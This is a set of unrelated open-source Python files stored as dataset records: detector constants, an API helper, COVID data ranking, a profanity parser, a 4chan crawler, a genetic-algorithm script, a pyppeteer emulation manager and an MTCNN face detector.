m_integrand, kappa_dval\n\n\"\"\"\nConstants from information provided in Auger Collabration publications on the 2022 dataset.\n\n* latitude and longitude taken from Auger Collaboration 2008.\n* Information on periods and exposures from Auger Collaboration et al. 2022 (arXiv:2206.13492).\n* M values calculated by integrating the m_integrand in exposure.py\nover the unit sphere for certain values of theta_m. \n\n@author Keito Watanabe\n@date September 2022\n\"\"\"\n\n# position of the PAO [rad]\nlat = np.deg2rad(-35.2)\nlon = np.deg2rad(-69.4)\nheight = 1400 # [m]\nauger_location = EarthLocation(lat = lat * u.rad, lon = lon * u.rad,\n height = height * u.m)\n\n# threshold zenith angle\ntheta_m = np.deg2rad(80)\n\n# start year of observation\nstart_year = 2004\n\n# get total period as the Eth is different from 2014 dataset\nperiod_start = date(2004, 1, 1)\nperiod_end = date(2020, 12, 31)\n\n# length of each period in years\ndeltat = (period_end - period_start).days / 365.25\n\n# total exposure, vertical and inclined in km^2 sr yr\nalpha_T_vert = 95700\nalpha_T_incl = 26300\nalpha_T = alpha_T_vert + alpha_T_incl\n\n# calculate M (integral over exposure factor) [sr]\ndetector_params = []\ndetector_params.append(np.cos(lat))\ndetector_params.append(np.sin(lat))\ndetector_params.append(np.cos(theta_m))\ndetector_params.append(alpha_T)\nM, Merr = integrate.quad(m_integrand, 0, np.pi, args = detector_params)\ndetector_params.append(M)\n\n# calculate effective area in km^2\nA = alpha_T / (M * deltat)\nA_incl = alpha_T_incl / (M * deltat)\nA_vert = alpha_T_vert / (M * deltat)\n\n# reconstruction uncertainty for arrival direction\nsig_omega = 1.0\nkappa_d = kappa_dval(sig_omega)\n\n# reconstruction uncertainty for energy\n# calibration unc ~ 14%, SD resolution ~ 7%, add in quadrature\nf_E = 0.156\n\n# threshold energy [EeV]\nEth = 32\n\n# For convenience\ndetector_properties = {}\ndetector_properties['label'] = 'auger2022'\ndetector_properties['lat'] = lat\ndetector_properties['lon'] = lon\ndetector_properties['height'] = height\ndetector_properties['theta_m'] = theta_m\ndetector_properties['kappa_d'] = kappa_d\ndetector_properties['f_E'] = f_E\ndetector_properties['A'] = A\ndetector_properties['alpha_T'] = alpha_T\ndetector_properties['Eth'] = Eth\ndetector_properties[\"start_year\"] = start_year","repo_name":"cescalara/fancy","sub_path":"fancy/detector/auger2022.py","file_name":"auger2022.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"23178482697","text":"import json\nimport logging\nfrom typing import List\n\nimport urllib3.exceptions\nfrom django.conf import settings\nfrom django.http import Http404, HttpResponseNotFound\nfrom rest_framework.settings import api_settings\n\nfrom base.models.person import Person\nfrom frontoffice.settings.osis_sdk.utils import build_mandatory_auth_headers\n\nlogger = logging.getLogger(settings.DEFAULT_LOGGER)\n\n\nclass ServiceException(Exception):\n def __init__(self, api_exception, *args, **kwargs):\n self.original_exception = api_exception\n super().__init__(*args, **kwargs)\n\n @property\n def messages(self) -> List[str]:\n json_body = json.loads(self.original_exception.body)\n return list({error['detail'] for error in json_body[api_settings.NON_FIELD_ERRORS_KEY]})\n\n @property\n def status(self):\n return self.original_exception.status\n\n\ndef call_api(settings_sdk, sdk, api, person: 'Person', method_to_call: str, **kwargs):\n configuration = 
settings_sdk.build_configuration()\n with sdk.ApiClient(configuration) as api_client:\n\n api_instance = api(api_client)\n try:\n class_method = getattr(api_instance, method_to_call)\n result = class_method(**build_mandatory_auth_headers(person), **kwargs)\n except sdk.ApiException as api_exception:\n logger.warning(api_exception)\n if api_exception.status == HttpResponseNotFound.status_code:\n raise Http404\n raise ServiceException(api_exception)\n except (urllib3.exceptions.HTTPError, Http404) as e:\n # Run in degraded mode in order to prevent crash all app\n logger.error(e)\n return None\n return result\n","repo_name":"uclouvain/osis-portal","sub_path":"base/services/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"40"} +{"seq_id":"13359393590","text":"import pandas as pd\r\n\r\ndef topdistricts(df, time_id):\r\n time_id_list = []\r\n method_list = []\r\n spot_list = []\r\n district_id1_list = []\r\n district_id2_list = []\r\n district_id3_list = []\r\n district_id4_list = []\r\n district_id5_list = []\r\n \r\n if (time_id == 'week'):\r\n upper = 26\r\n elif (time_id == 'month'):\r\n upper = 8\r\n elif (time_id == 'overall'):\r\n upper = 2\r\n \r\n for i in range(1, upper):\r\n df_temp = df[df['timeid'] == i]\r\n \r\n df_largest = df_temp.nlargest(5, ['neighborhoodzscore'])\r\n time_id_list.append(i)\r\n method_list.append('neighborhood')\r\n spot_list.append('hot')\r\n \r\n district_id1_list.append(df_largest.iloc[0, 0])\r\n district_id2_list.append(df_largest.iloc[1, 0])\r\n district_id3_list.append(df_largest.iloc[2, 0])\r\n district_id4_list.append(df_largest.iloc[3, 0])\r\n district_id5_list.append(df_largest.iloc[4, 0])\r\n \r\n df_largest_state = df_temp.nlargest(5, ['statezscore'])\r\n time_id_list.append(i)\r\n method_list.append('state')\r\n spot_list.append('hot')\r\n district_id1_list.append(df_largest_state.iloc[0, 0])\r\n district_id2_list.append(df_largest_state.iloc[1, 0])\r\n district_id3_list.append(df_largest_state.iloc[2, 0])\r\n district_id4_list.append(df_largest_state.iloc[3, 0])\r\n district_id5_list.append(df_largest_state.iloc[4, 0])\r\n \r\n df_smallest = df_temp.nsmallest(5, ['neighborhoodzscore'])\r\n time_id_list.append(i)\r\n method_list.append('neighborhood')\r\n spot_list.append('cold')\r\n district_id1_list.append(df_smallest.iloc[0, 0])\r\n district_id2_list.append(df_smallest.iloc[1, 0])\r\n district_id3_list.append(df_smallest.iloc[2, 0])\r\n district_id4_list.append(df_smallest.iloc[3, 0])\r\n district_id5_list.append(df_smallest.iloc[4, 0])\r\n \r\n df_smallest_state = df_temp.nsmallest(5, ['statezscore'])\r\n time_id_list.append(i)\r\n method_list.append('state')\r\n spot_list.append('cold')\r\n district_id1_list.append(df_smallest_state.iloc[0, 0])\r\n district_id2_list.append(df_smallest_state.iloc[1, 0])\r\n district_id3_list.append(df_smallest_state.iloc[2, 0])\r\n district_id4_list.append(df_smallest_state.iloc[3, 0])\r\n district_id5_list.append(df_smallest_state.iloc[4, 0])\r\n \r\n df_top = pd.DataFrame(list(zip(time_id_list, method_list, spot_list, district_id1_list, district_id2_list, district_id3_list, district_id4_list, district_id5_list)), columns= ['timeid', 'method', 'spot', 'districtid1', 'districtid2', 'districtid3', 'districtid4', 'districtid5']) \r\n return df_top\r\n\r\ndf_zscore_week = pd.read_csv('zscore-week.csv')\r\ndf_top_week = topdistricts(df_zscore_week, 'week')\r\ndf_top_week.to_csv('top-week.csv', 
index=False)\r\n\r\ndf_zscore_month = pd.read_csv('zscore-month.csv')\r\ndf_top_month = topdistricts(df_zscore_month, 'month')\r\ndf_top_month.to_csv('top-month.csv', index=False)\r\n\r\ndf_zscore_overall = pd.read_csv('zscore-overall.csv')\r\ndf_top_overall = topdistricts(df_zscore_overall, 'overall')\r\ndf_top_overall.to_csv('top-overall.csv', index=False)","repo_name":"gaganmangat/COVID-19-Analysis-System","sub_path":"8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24036463641","text":"import os\nimport re\nimport pandas as pd\nfrom tqdm import tqdm\n\nclass Zerofucks:\n '''Class container for profanity parser utility\n\n # instantiate class\n myFinder = Zerofucks()\n \n # load in bad words list from file,\n # write to list my_badwords\n my_badwords = []\n badwords_file = open('./bad_words.txt', \"r\").readlines()\n for line in badwords_file:\n my_badwords.append(line.rstrip())\n '''\n \n def __init__(self):\n self.df = pd.DataFrame(\n {'file': [], 'line_no': [], 'badword': [], 'content': []}, \n columns=['file', 'line_no', 'badword', 'content']\n )\n \n def __makeRegex__(self, shitToFind=[\"fuck\", \"shit\"]):\n '''\n shitToFind is a list of word literals,\n uses word boundary \\b\n\n returns a regex string\n '''\n shitString = ''\n for word in shitToFind:\n # shitString += r\"\\b\" + word + r\"\\b|\"\n \n # case insensitive (?i) has deprecation warning:\n # https://github.com/bottlepy/bottle/issues/949\n shitString += r\"(?i)\\b\" + word + r\"\\b|\"\n return shitString[:-1]\n \n def write_df(self, path='./', filename='out.csv'):\n '''\n path: path to where you want to put the file\n filename: name of file\n \n Writes the csv from self.df to a csv file\n '''\n try:\n self.df.to_csv(path_or_buf=path + filename, index=False, chunksize=1000)\n print(\"File written to {}\".format(path + filename))\n except:\n print(\"Unable to write csv, did you run .find_shit() yet?\")\n \n def erase_in_file(self, input_file, replace_with='', postfix='', bad_words=['fuck', 'shit']):\n '''\n Erases any bad words from the user specified files.\n \n Takes an input file and writes to an outputfile.\n ALSO returns a dictionary for forensic - what did you change - purposes\n \n input_file: full path to the file you want to process / remove bad words from\n replace_with: the string you'll be replacing the bad word with (defaults to nothing, '')\n postfix: optional string value you want to add to the end of the outputfile. If blank, it'll overwrite the input file.\n '''\n \n print('Replacing bad words in {}...'.format(input_file))\n try:\n tempfile = open(input_file + '.tmp', mode='w')\n with open(input_file, 'r', encoding='iso-8859-15') as infile:\n shit_dict = {}\n for content in tqdm(infile):\n if len(re.findall(self.__makeRegex__(bad_words), content)) > 0:\n if re.findall(self.__makeRegex__(bad_words), content)[0] in shit_dict:\n shit_dict[re.findall(self.__makeRegex__(bad_words), content)[0]] += 1\n else:\n shit_dict[re.findall(self.__makeRegex__(bad_words), content)[0]] = 1\n # the '' in this line is what to replace the bad words with. 
In this case, nothing at all.\n tempfile.write(re.sub(self.__makeRegex__(bad_words), replace_with, content))\n # write the tempfile contents to the original file \n print('overwriting {} with {}'.format(input_file+'.tmp', input_file+postfix))\n os.rename(input_file + '.tmp', input_file+postfix)\n return shit_dict\n except ValueError:\n print(f'Unable to replace bad words in {input_file}.')\n \n def erase_in_dirs(self, root_paths, postfix='', bad_words=['fuck', 'shit'], ignore_extensions=['ipynb']):\n '''\n root_paths: LIST of directories to replace shit in. Must be a list. Cannot be a specific file.\n postfix: string to add to the end of the name of the output file. If input is 'myFile.csv' with a postfix of '_new', the scrubbed file would be 'myFile.csv_new'. No prefix overwrites the existing file.\n bad_words: optional list of words to replace in the files within root_paths\n '''\n \n audit_log = {\n 'ignored': [],\n 'processed': []\n }\n\n for root_path in root_paths:\n for (root, dirs, files) in os.walk(root_path):\n for name in files:\n try:\n # if the file extension is one we want to ignore\n file_ext = name.split('.')[-1]\n if file_ext in ignore_extensions:\n print(f'ignoring {self.__get_path(root, dirs, name)}')\n # add the filename to the ignored section of the audit_log\n audit_log['ignored'].append(self.__get_path(root, dirs, name))\n continue\n # otherwise, we'll erase shit in it\n else:\n print(f'deleting shit in {self.__get_path(root, dirs, name)}')\n self.erase_in_file(root+'/'+name, postfix=postfix, bad_words=bad_words)\n audit_log['processed'].append(self.__get_path(root, dirs, name))\n # if the filename has no extension, we still process it\n except:\n print(f'no file extension in {self.__get_path(root, dirs, name)}, erasing shit anyway')\n self.erase_in_file(root+'/'+name, postfix=postfix, bad_words=bad_words)\n audit_log['processed'].append(self.__get_path(root, dirs, name))\n return audit_log\n\n \n def find_shit(self, root='./', bad_words=['fuck', 'shit'], include_content=True):\n '''\n root: the directory root where you want the crawl to start\n bad_words: list of words you want to search for.\n These can also be regular expressions. It will\n match partials, so 'fuck' will match 'fucking',\n 'unfuckingbelievable', etc. 
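        (Note: with __makeRegex__ as written above, each word is wrapped
        in (?i)\b ... \b, so those partial matches are in fact suppressed
        unless the word itself carries its own wildcards.)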
Use \\b and similar\n to constrain to word boundaries.\n \n The meat and potatoes, this is what conducts the walk\n and writes the resultant dataframe to self.df.\n \n To export the df to a csv, use the write_df() method.\n ''' \n for item in os.walk(root):\n \n # keep records for each directory parsed\n file_df = []\n line_no_df = []\n badword_df = []\n if include_content:\n content_df = []\n \n for file in item[2]:\n print('Searching {}'.format(item[0]+'/'+file))\n try:\n openfile = open(item[0] + '/' + file, \"r\").readlines()\n for line_no, content in enumerate(openfile):\n if len(re.findall(self.__makeRegex__(bad_words), content)) > 0:\n for i, badword in enumerate(re.findall(self.__makeRegex__(bad_words), content)):\n file_df.append(item[0]+'/'+file)\n line_no_df.append(line_no)\n badword_df.append(re.findall(self.__makeRegex__(bad_words),content)[i])\n # rstrip to remove newline character\n if include_content:\n content_df.append(content.rstrip())\n except:\n pass\n \n# print(content_df)\n\n # write the records to the dataframe with each dir parsed\n if include_content:\n self.df = self.df.append(pd.DataFrame({'file': file_df, \n 'line_no': line_no_df, \n 'badword': badword_df,\n 'content': content_df},\n columns=['file', 'line_no', 'badword', 'content']),\n ignore_index=True)\n else:\n self.df = self.df.append(pd.DataFrame({'file': file_df, \n 'line_no': line_no_df, \n 'badword': badword_df},\n columns=['file', 'line_no', 'badword']),\n ignore_index=True)\n \n # change the silly auto-detected float line_no to an integer\n self.df['line_no'] = self.df.copy()['line_no'].apply(lambda x: int(x))\n # return self.df\n print(\"Dataframe successfully created, \\n \\\n use .df to print the df, or \\n \\\n .write_df() method to write to file.\")\n\n\n def __get_path(self, root, dirs, name):\n '''\n returns the full path as a string\n '''\n dir_string = ''\n num_dirs = len(dirs)\n \n if num_dirs == 0:\n return(root+'/'+name)\n else:\n for idx, dir in enumerate(dirs):\n if idx < num_dirs:\n dir_string += dir + '/'\n else:\n dir_string += dir\n return(root+dir_string+name)\n\n","repo_name":"ggodreau/profanityParser","sub_path":"pparser.py","file_name":"pparser.py","file_ext":"py","file_size_in_byte":9090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2714582144","text":"#!/usr/bin/env python3\n# coding: utf-8\n\nimport requests\nimport records\nfrom time import time, sleep\nimport re\nimport html\nfrom tqdm import tqdm\n\nBOARD_LIST = ['b', 'lgbt', 'pol', 'r9k', 'bant', 'i', 'a']\n\nLAST_TIME = 0.0\n\nAUTH_SECRET = \"./auth.secret\" #content: user:password@hostname[\\n]\nDB_SIZE_SQL = \"./db_size.sql\"\n\n# Do not make more than one request per second.\ndef wait_get(url):\n global LAST_TIME\n while time() - LAST_TIME <= 1.0:\n sleep(0.1) # This is what the API wants, not me..!\n r = requests.get(url)\n LAST_TIME = time()\n return r\n\n# make clear text from 4chan posts\ndef clear_post(comment):\n comment = re.sub(r'>>\\d+<\\/a>(
<br>)*', '', comment)\n    comment = re.sub(r'<br>
', '\\n', comment)\n comment = re.sub(r'.*?<\\/span>', '', comment)\n comment = re.sub(r'<.*?>', '', comment)\n comment = re.sub(r'^>', '', comment, flags=re.MULTILINE)\n comment = re.sub(r'^>\\d+', '', comment, flags=re.MULTILINE)\n comment = html.unescape(comment)\n comment = re.sub(r'http\\S+', '', comment)\n return '\\n'.join([x for x in comment.split(\"\\n\") if x != ''])\n\nif __name__ == '__main__':\n\n it_count = 0\n er_count = 0\n start_time = time()\n while True:\n\n try:\n it_count += 1\n running_time = (time() - start_time) / 3600\n print(\"\\033[31m[ITERATION {}]\\033[37m Running for {:.2f}h with {} errors. [{:.2f} IT/s]\".format(it_count, running_time, er_count, running_time / it_count))\n\n # login database\n db = records.Database(\"postgresql://{}/cancer-corpus\".format(open(AUTH_SECRET, \"r\").read().split()[0]))\n\n # iterate over all interesting boards\n for board_name in BOARD_LIST:\n r = wait_get(\"https://a.4cdn.org/{}/threads.json\".format(board_name))\n board = r.json()\n relsize = db.query_file(DB_SIZE_SQL)[0][\"total\"]\n postcnt = db.query(\"select count(*) as count from fourchan\")[0][\"count\"]\n print(\"\\033[36m[CRAWLING /{}/]\\033[37m database_size:{}; post_count:{}\".format(board_name, relsize, postcnt))\n\n # iterate over all pages (11) in the board\n for page in board:\n print(\"Crawling 4chan.org/{}/{}\".format(board_name, page[\"page\"]))\n post_counter = 0\n\n # iterate over all threads (15) on the page\n for thread in tqdm(page[\"threads\"]):\n r = wait_get(\"https://a.4cdn.org/{}/thread/{}.json\".format(board_name, thread[\"no\"]))\n try: # this sometimes raises strange JSON errors\n thread = r.json()\n except:\n continue\n\n # iterate over all posts (>= 1) in the thread\n for post in thread[\"posts\"]:\n if \"com\" in post and \"no\" in post:\n\n # test if post already existing\n r = db.query(\"SELECT count(1) AS out FROM fourchan WHERE post_id = :id\", id=post['no'])\n if r[0][\"out\"] != 0: continue\n\n # process comment\n comment = clear_post(post[\"com\"])\n if comment == \"\": continue\n post_counter += 1\n\n # insert comment into database\n db.query(\"INSERT INTO fourchan\\\n VALUES (:id, :com)\",\n id=post[\"no\"], com=comment)\n print(\" - Added {} new posts!\".format(post_counter))\n\n except KeyboardInterrupt as e:\n # terminate on Ctrl+C\n raise e\n except:\n # shift BOARD_LIST to begin with next board, not from beginning\n ind = BOARD_LIST.index(board_name) + 1\n BOARD_LIST = BOARD_LIST[ind:] + BOARD_LIST[:ind]\n er_count += 1\n print(\"\\033[31m[ITERATION {}]\\033[37m An error occured. 
New BOARD_LIST: {}\".format(it_count, BOARD_LIST))\n continue\n","repo_name":"SinForest/cancer-bot","sub_path":"crawl_4chan.py","file_name":"crawl_4chan.py","file_ext":"py","file_size_in_byte":4264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12571230","text":"from eduea import EA , EAOpts , Binary\nimport random\n\n# random.seed(5641984138)\n\n# f(x) = a3*x^3 + a2*x^2 + a1*x + a0\na3 = 1\na2 = 2\na1 = 0\na0 = 10\n\n# x1 <= x <= x2\nx1 = 0.0\nx2 = 15.0\n\nN = 20\n\n\nmx = (1 << N ) - 1\n\nk1 = ( x2 - x1 ) / mx\nk2 = x1\n\ndef decode(genotype):\n v , s = 1 , 0\n for i in genotype:\n s = s + v * i\n v = v * 2\n phenotype = k1 * s + k2\n return phenotype\n\n# im wiekszy \"fitness\" tym lepszy osobnik !!!\ndef fitness(phenotype) :\n x = phenotype\n y = a3*x**3 + a2*x**2 + a1*x + a0\n return y\n\n\n\nwyniki = []\n\ndef strPhenotype(pehontype):\n return pehontype\n\ndef strGenotype(genotype):\n return genotype\n\n\nfor population in [i for i in range(10,150)]:\n solutions = []\n for proby in range(10):\n try:\n # Ustawienia solvera \n options = EAOpts()\n options.random_individual = Binary.random(N)\n options.decode = decode\n options.fitness = fitness\n options.pop_size = population\n options.crossover = Binary.onePointCrossover\n options.mutation = Binary.mutation\n options.stop_generations = 20\n # options.details = \"individuals\"\n # options.str_phenotype = strPhenotype\n # options.str_genotype = strGenotype\n # options.serialize = strGenotype\n\n # rozwiązywanie\n solution = EA(options)\n\n # wyświetlenie wyniku\n print ( \" The best solution found is = %5.30f \" % solution.best_solution.value )\n print ( \" for x = %5.30f \" % solution.best_solution.phenotype )\n\n solutions.append(solution)\n\n except:\n pass\n solutions1 = [s.best_solution.phenotype for s in solutions]\n best = None\n if len(solutions1):\n best = sum(solutions1)/len(solutions1)\n wyniki.append( {\"Population\": population, \"Best\": best, \"Solutions\": solutions1} )\n\nprint(wyniki)\n\nimport csv\nwith open('kwadratowa.csv', 'w', newline='') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter='\\t', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow([\"Population\", \"Best\"])\n \n def localize_floats(row):\n return [\n str(el).replace('.', ',') if isinstance(el, float) else el \n for el in row\n ]\n\n for wynik in wyniki:\n spamwriter.writerow(localize_floats([wynik[\"Population\"], wynik[\"Best\"]]))\n","repo_name":"DawiX123PL/POLSL2_MO","sub_path":"Lab3/src/kwadratowa2.py","file_name":"kwadratowa2.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34145887226","text":"class Validation:\n def validate(self):\n flag=1\n while flag:\n phone_No=str(input(\"Enter the phone Number:\"))\n if(len(phone_No) == 10 and int(phone_No)>6000000000 and int(phone_No)<9999999999):\n break\n else:\n print(\"?????????????InValid phone number??????????????\")\n\n \n\n\n\n\n\n","repo_name":"DEVIDHARSANA19/Python-Application","sub_path":"Documents/Application/Validation.py","file_name":"Validation.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16000575469","text":"source = '''\nfunction injectedTouchEventsFunction() {\n const touchEvents = ['ontouchstart', 'ontouchend', 'ontouchmove', 'ontouchcancel'];\n const recepients = [window.__proto__, 
document.__proto__];\n for (let i = 0; i < touchEvents.length; ++i) {\n for (let j = 0; j < recepients.length; ++j) {\n if (!(touchEvents[i] in recepients[j])) {\n Object.defineProperty(recepients[j], touchEvents[i], {\n value: null, writable: true, configurable: true, enumerable: true\n });\n }\n }\n }\n }\n'''\n\n\nclass EmulationManager(object):\n\n def __init__(self, client):\n self._client = client\n self._emulating_mobile = False\n self._injected_touch_script_id = None\n\n async def emulate_viewport(self, client, viewport={}):\n viewport = {**{\n 'isMobile': False,\n 'deviceScaleFactor': 1,\n 'isLandscape': True,\n 'hasTouch': False\n }, **viewport}\n if 'isLandscape' in viewport and viewport['isLandscape']:\n screen_orientation = {'angle': 90, 'type': 'landscapePrimary'}\n else:\n screen_orientation = {'angle': 0, 'type': 'portraitPrimary'}\n\n await self._client.send('Emulation.setDeviceMetricsOverride', {\n 'mobile': viewport['isMobile'],\n 'width': viewport['width'],\n 'height': viewport['height'],\n 'deviceScaleFactor': viewport['deviceScaleFactor'],\n 'screenOrientation': screen_orientation\n })\n await self._client.send('Emulation.setTouchEmulationEnabled', {\n 'enabled': viewport['hasTouch'],\n 'configuration': 'mobile' if viewport['isMobile'] else 'desktop'\n })\n\n reload_needed = False\n if viewport['hasTouch'] and not self._injected_touch_script_id:\n _source = '({})()'.format(source)\n res = await self._client.send(\n 'Page.addScriptToEvaluateOnNewDocument', {\n 'source': _source\n }\n )\n self._injected_touch_script_id = res['identifier']\n reload_needed = True\n elif not viewport['hasTouch'] and self._injected_touch_script_id:\n await self._client.send(\n 'Page.removeScriptToEvaluateOnNewDocument', {\n 'identifier': self._injected_touch_script_id\n }\n )\n self._injected_touch_script_id = None\n reload_needed = True\n if self._emulating_mobile != viewport['isMobile']:\n reload_needed = True\n self._emulating_mobile = viewport['isMobile']\n return reload_needed\n","repo_name":"brijeshb42/pyppeteer","sub_path":"pyppeteer/emulation_manager.py","file_name":"emulation_manager.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22698471092","text":"import os\nfrom setuptools import setup\nfrom setuptools import find_packages\n\nVERSION = \"0.0.1\"\n\nsetup( name = \"pingpong\",\n version = VERSION,\n packages = find_packages(exclude=[\"tests\", \"tests.*\"]),\n author = \"Diego Souza\",\n author_email = \"dsouza+pingpong@bitforest.org\",\n description = \"A library for quickly creating line-based interactive programs\",\n keywords = \"interactive line-based protocols\",\n data_files = ( (\"/etc/pingpong\", [ \"pingpong/samples/ping.tac\",\n \"pingpong/samples/hpflex10.tac\"\n ]\n ),\n ),\n install_requires = [ \"twisted >= 11.0.0\",\n \"pycrypto >= 2.2\"\n ]\n )\n","repo_name":"dgvncsz0f/pingpong","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"34512840888","text":"import mtcnn_detect_face\nimport tensorflow as tf\nfrom keras import backend as K\nimport numpy as np\nimport cv2\nimport os\n\nclass MTCNNFaceDetector():\n \"\"\"\n This class load the MTCNN network and perform face detection.\n \n Attributes:\n model_path: path to the MTCNN weights files\n \"\"\"\n def __init__(self, sess, model_path=\"./mtcnn_weights/\"):\n 
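        # MTCNN runs a three-stage cascade: P-Net proposes candidate windows
        # over an image pyramid, R-Net rejects most false positives, and
        # O-Net emits the final boxes plus five facial landmarks.
        # create_mtcnn() below wraps each stage in a Keras backend function
        # so that detect_face() can evaluate all three directly.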
self.pnet = None\n self.rnet = None\n self.onet = None\n self.create_mtcnn(sess, model_path)\n \n def create_mtcnn(self, sess, model_path):\n if not model_path:\n model_path, _ = os.path.split(os.path.realpath(__file__))\n\n with tf.variable_scope('pnet'):\n data = tf.placeholder(tf.float32, (None,None,None,3), 'input')\n pnet = mtcnn_detect_face.PNet({'data':data})\n pnet.load(os.path.join(model_path, 'det1.npy'), sess)\n with tf.variable_scope('rnet'):\n data = tf.placeholder(tf.float32, (None,24,24,3), 'input')\n rnet = mtcnn_detect_face.RNet({'data':data})\n rnet.load(os.path.join(model_path, 'det2.npy'), sess)\n with tf.variable_scope('onet'):\n data = tf.placeholder(tf.float32, (None,48,48,3), 'input')\n onet = mtcnn_detect_face.ONet({'data':data})\n onet.load(os.path.join(model_path, 'det3.npy'), sess)\n self.pnet = K.function([pnet.layers['data']], [pnet.layers['conv4-2'], pnet.layers['prob1']])\n self.rnet = K.function([rnet.layers['data']], [rnet.layers['conv5-2'], rnet.layers['prob1']])\n self.onet = K.function([onet.layers['data']], [onet.layers['conv6-2'], onet.layers['conv6-3'], onet.layers['prob1']])\n \n def detect_face(self, image, minsize=20, threshold=0.7, factor=0.709, use_auto_downscaling=True, min_face_area=25*25):\n if use_auto_downscaling:\n image, scale_factor = self.auto_downscale(image)\n \n faces, pnts = mtcnn_detect_face.detect_face(\n image, minsize, \n self.pnet, self.rnet, self.onet, \n [0.6, 0.7, threshold], \n factor)\n faces = self.process_mtcnn_bbox(faces, image.shape)\n faces, pnts = self.remove_small_faces(faces, pnts, min_face_area)\n \n if use_auto_downscaling:\n faces = self.calibrate_coord(faces, scale_factor)\n pnts = self.calibrate_landmarks(pnts, scale_factor)\n return faces, pnts\n \n def auto_downscale(self, image):\n if self.is_higher_than_1080p(image):\n scale_factor = 4\n resized_image = cv2.resize(image, \n (image.shape[1]//scale_factor, \n image.shape[0]//scale_factor))\n elif self.is_higher_than_720p(image):\n scale_factor = 3\n resized_image = cv2.resize(image, \n (image.shape[1]//scale_factor, \n image.shape[0]//scale_factor))\n elif self.is_higher_than_480p(image):\n scale_factor = 2\n resized_image = cv2.resize(image, \n (image.shape[1]//scale_factor, \n image.shape[0]//scale_factor))\n else:\n scale_factor = 1\n resized_image = image.copy()\n return resized_image, scale_factor\n \n @staticmethod\n def is_higher_than_480p(x):\n return (x.shape[0] * x.shape[1]) >= (858*480)\n\n @staticmethod\n def is_higher_than_720p(x):\n return (x.shape[0] * x.shape[1]) >= (1280*720)\n\n @staticmethod\n def is_higher_than_1080p(x):\n return (x.shape[0] * x.shape[1]) >= (1920*1080)\n\n @staticmethod\n def process_mtcnn_bbox(bboxes, im_shape):\n # output bbox coordinate of MTCNN is (y0, x0, y1, x1)\n # Here we process the bbox coord. 
to a square bbox with ordering (x0, y1, x1, y0)\n for i, bbox in enumerate(bboxes):\n y0, x0, y1, x1 = bboxes[i,0:4]\n w = int(y1 - y0)\n h = int(x1 - x0)\n length = (w + h)/2\n center = (int((x1+x0)/2),int((y1+y0)/2))\n new_x0 = np.max([0, (center[0]-length//2)])#.astype(np.int32)\n new_x1 = np.min([im_shape[0], (center[0]+length//2)])#.astype(np.int32)\n new_y0 = np.max([0, (center[1]-length//2)])#.astype(np.int32)\n new_y1 = np.min([im_shape[1], (center[1]+length//2)])#.astype(np.int32)\n bboxes[i,0:4] = new_x0, new_y1, new_x1, new_y0\n return bboxes\n \n @staticmethod\n def calibrate_coord(faces, scale_factor):\n for i, (x0, y1, x1, y0, _) in enumerate(faces):\n faces[i] = (x0*scale_factor, y1*scale_factor, \n x1*scale_factor, y0*scale_factor, _)\n return faces\n\n @staticmethod\n def calibrate_landmarks(pnts, scale_factor):\n # pnts is a numpy array\n return np.array([xy * scale_factor for xy in pnts])\n \n @staticmethod\n def remove_small_faces(faces, pnts, min_area=25*25):\n def compute_area(face_coord):\n x0, y1, x1, y0, _ = face_coord\n area = np.abs((x1 - x0) * (y1 - y0))\n return area\n \n new_faces = []\n new_pnts = []\n # faces has shape (num_faces, coord), and pnts has shape (coord, num_faces)\n for face,pnt in zip(faces, pnts.transpose()):\n if compute_area(face) >= min_area:\n new_faces.append(face)\n new_pnts.append(pnt)\n new_faces = np.array(new_faces)\n new_pnts = np.array(new_pnts).transpose()\n return new_faces, new_pnts","repo_name":"shaoanlu/faceswap-GAN","sub_path":"detector/face_detector.py","file_name":"face_detector.py","file_ext":"py","file_size_in_byte":5655,"program_lang":"python","lang":"en","doc_type":"code","stars":3303,"dataset":"github-code","pt":"40"} +{"seq_id":"35845865011","text":"from concurrent.futures import ThreadPoolExecutor\nimport subprocess\n\n\n_dispatcher = None\n\n\ndef get_verifier_dispatcher():\n global _dispatcher\n if _dispatcher is None:\n _dispatcher = VerifierDispatcher()\n return _dispatcher\n\n\nclass VerifierDispatcher:\n\n def __init__(self):\n self._pool = ThreadPoolExecutor(max_workers=1)\n self._jar_path = r\".\\Coral-2.0.jar\"\n\n def run(self, filepath, handle):\n self._pool.submit(self._run, filepath, handle)\n\n def _run(self, filepath, handle):\n process = subprocess.Popen(\n [\"java\", \"-jar\", self._jar_path, \"GreenStart\", \"1\", \"--auto_parse_network\", filepath],\n stdout=subprocess.PIPE, bufsize=10, universal_newlines=True\n )\n while True:\n buf = process.stdout.readline()\n if not buf :\n if process.poll() is not None:\n break\n continue\n handle({\"type\": \"result\", \"data\": buf.strip()})\n handle({\"type\": \"finish\"})\n","repo_name":"Mauue/DDPVScripts","sub_path":"server/dispatcher/VerifierDispatcher.py","file_name":"VerifierDispatcher.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10926506475","text":"#!/usr/bin/python\r\n\"\"\"\r\n MCU update tool, it attaches to Probe daemon via 